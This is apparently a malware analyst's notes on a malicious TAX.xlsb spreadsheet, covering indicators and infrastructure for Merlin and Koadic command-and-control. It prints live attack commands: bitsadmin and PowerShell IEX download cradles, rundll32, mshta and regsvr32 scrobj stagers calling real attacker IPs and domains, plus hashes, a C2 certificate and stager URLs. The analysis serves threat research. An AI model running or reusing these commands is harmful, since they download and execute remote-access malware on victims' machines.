ea0923854208956b1f563c5301bd0c9a8561128b7bd48c5b475ddeea29da8a1c - TAX.xlsb https://app.any.run/tasks/1c7a79e3-a201-43d3-9f4f-693d2049355c/
cmd.exe /c cd c:\&&mkdir Intel
ncmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/admin.bat c:\Intel\admin.bat
9cmd.exe /c cd c:\Intel&&timeout /t 15&&c:\Intel\admin.bat
jcmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.bin c:\Intel\mer.bin
jcmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.dll c:\Intel\mer.dll
Fcmd.exe /c cd c:\Intel&&timeout /t 15&&rename mer.bin mer.exe&&mer.exe
cmd.exe /c cd c:\Intel&&timeout /t 15&& copy mer.dll mery.dll&&rundll32.exe mer.dll,Run https://38.132.124.172:443/®svr32 /s mery.dll,Run https://38.132.124.172:443/
npowershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://kilolo.site/raw.txt'))
opowershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('https://kilolo.site/raw.txt'))
"mshta http://37.72.175.188:80/home
:regsvr32 /s /u /n /i:http://37.72.175.188:443/index scrobj
mer.dll was Merlin DLL agent - golang fc0bece7ca5c54b7a2032bc0cca2b65f4c20cb08b54a9acca7df037b9d30d2c4
below is Merlin framework C2 - easy signature on empty subject and issuer for self signed
# openssl s_client -connect 38.132.124.172:443
CONNECTED(00000003)
Can't use SSL_get_servername
depth=0
verify error:num=18:self signed certificate
verify return:1
depth=0
verify return:1
---
Certificate chain
0 s:
i:
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIEwDCCAqigAwIBAgIRALEpO/ZeDFiIVssqebRuwb8wDQYJKoZIhvcNAQELBQAw
ADAeFw0xOTEyMTQxODMwNThaFw0yMTEyMTQxODMwNThaMAAwggIiMA0GCSqGSIb3
DQEBAQUAA4ICDwAwggIKAoICAQDEOt7Jsc5Ey+UjNR3QXZI17jCORGPcMnDGHEfP
5DBGPmvw/DDnf8I/Jv3Bi0zeTIDprRHnO9B8uS96mBN5iObPaiaCO9z7SDYjPyYJ
KowztNd9HvAK9dr613iYhAitrFJYqKv/1oFvwqPEYp/FsXsm1+ewxioWxR0xtS8z
JvVzjal+DF4HeViyAMpUSh29P9EjwT+bSfyE8kcPd/uYzOoOL2y/NoBX9QGJto6J
XZ7vl1sLEsk9afBA99GMDbXe2ETPh5/8fDt1B11Aabj96gZNbI7kSVALM0x01no4
OlAyuHG9rVbYoDdtM1MT8oYYpO7RYlA5QW+uo4tcxYfEn4OhUDvhjCzWUmE50KmO
c3c8Ukpn4evwf5rjRonDW4oysKx13i8UCkx4xzxVPZSHxIG30JEiRFH64MOwtF74
hywd07qGPS2KSjPyy6gjRUDEkhxZIHKfnmGc0mmnkDEwtD/1HoHybGCQCQovJuy5
mT4wEV9Xjs4jwoOxBfP+xYPp4Rv0moEgIVkQFVA2t19j3baPb712arTFR2469tD5
9NErRN0M9Z/qbsZIv+pSzspl5IJme5u48RB0Xu0phoahorU3u/e48cAvpjfOk+Mx
8ymUOvQhfE9FF8ZndTzUm1va8BrMil1k1M6Mv49UNCrv6YkQ3GLY5eG7RnXB95Ej
RgEJ7wIDAQABozUwMzAOBgNVHQ8BAf8EBAMCAqQwEwYDVR0lBAwwCgYIKwYBBQUH
AwEwDAYDVR0TAQH/BAIwADANBgkqhkiG9w0BAQsFAAOCAgEArJBO2dtW2LL4RKSr
MHTyuFaLoQY+GkqJKYv4Ww2lar+x2orOP9HBzlFXlWLlBhh/yrvRoznWLeAvzJ1h
Fb3Tl1rxErI1TJl+8uLG1aTJujz1qoibh+VdESvvdQVEW86ZmfyHCecAVu+I11ur
7gpmEY1atio3Fo0dvGsMECvYBn+lmBQD186QKTASNFD/yzY8cDqf2dN4kbMkgiLt
XAnRa9K0kgEgpHY+E6FFSjf+Ax7OAMg7PPbdM3i/hygL2xiDbDNfpGQX20gUCfVg
c1MXfGEiZiJphK7FySHH+zwbXuipM3Rnm7/qVvravmnVqMdQviqs4xg96MVwWL9R
8isZ1u5Je8DSGcXqhMl/ew9G22vJeLYPClUWAuBEYQ821gnliOEEy4xl59MMRYjn
anV9IsEUMhkoFlQA9ifEyhKQPMbVOXy7zzWU+H3AzDOzkp2YfvmgLNhazRxn9mTq
1zzyWWDOn+hjSpz7ncgQotUIQppbenz8Cv0nH7dtANPgG6Vvp9+AexQTkhZLItff
XLr4FizoRkdzkspffKio2u4HMPpw/TEiD/bC3qcOvLbau+KwJWkURSKp2PCgEJBV
9RgqkizUhitkip9MiWbqUEMHKBlS1dsRHBaOB6TeFVpJBMAQ+sJsNlax/G3YdLaj
z4VAo+VAFaOAwJ0eH4lbRR7kcA8=
-----END CERTIFICATE-----
hxxp://37.72.175[.]188:443/index
is koadic backdoor framework - script based with python server
home - 276e409e3371f1b3d905737be03c99ed5b3b4519a03db5aec21b609d488ae06e
index - d369d50b3447d354bc6d69ffb45c2e57dc149ed58946bcfe4cf567806c1676b3
These are both koadic stagers from data/stager/stdlib.js with different sessions for handing off
hxxp://37.72.175[.]188:80/home?4IZ9S56AA4=e92f3574b16a4a0da0f15b3feca6f16f;N6URWPF5YH=
hxxp://37.72.175[.]188:443/index?6S2YBE0VOY=a9136a756c1e4ab39a0d737c0dbec493;KWYS8DF1UJ=